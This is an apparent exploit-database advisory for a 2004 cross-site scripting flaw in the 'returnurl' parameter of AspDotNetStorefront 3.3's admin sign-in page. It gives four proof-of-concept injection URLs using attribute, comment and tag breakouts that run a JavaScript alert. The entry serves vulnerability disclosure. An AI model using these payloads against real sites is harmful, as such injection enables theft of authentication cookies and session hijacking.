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AspDotNetStorefront 3.3 - 'ReturnURL' Cross-Site Scripting

🗓️ 09 Jun 2004 00:00:00Reported by Thomas RyanType 
exploitdb
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AspDotNetStorefront 3.3 has a cross-site scripting vulnerability in the returnurl parameter.

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source: https://www.securityfocus.com/bid/10507/info

AspDotNetStorefront is prone to a cross-site scripting vulnerability. This issue exists due to insufficient sanitization of user-supplied data. The problem presents itself in the 'returnurl' parameter of the 'signin.aspx' script of the application and can allow remote attackers to steal cookie-based authentication credentials and carry out other attacks.

AspDotNetStorefront 3.3 is reportedly affected by this issue, however, it is possible that other versions are affected as well.

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=1"style=
"background:url(javascript:alert('Vulnerable_To_XSS'))"%20"

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=--><scri
pt>alert('Vulnerable_To_XSS')</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"><scri
pt>alert("Vulnerable_To_XSS")</script>

http://www.example.com/aspdotnetcart/admin/signin.aspx?returnurl=>"'><img
%20src="javascript:alert('Vulnerable_To_XSS')">

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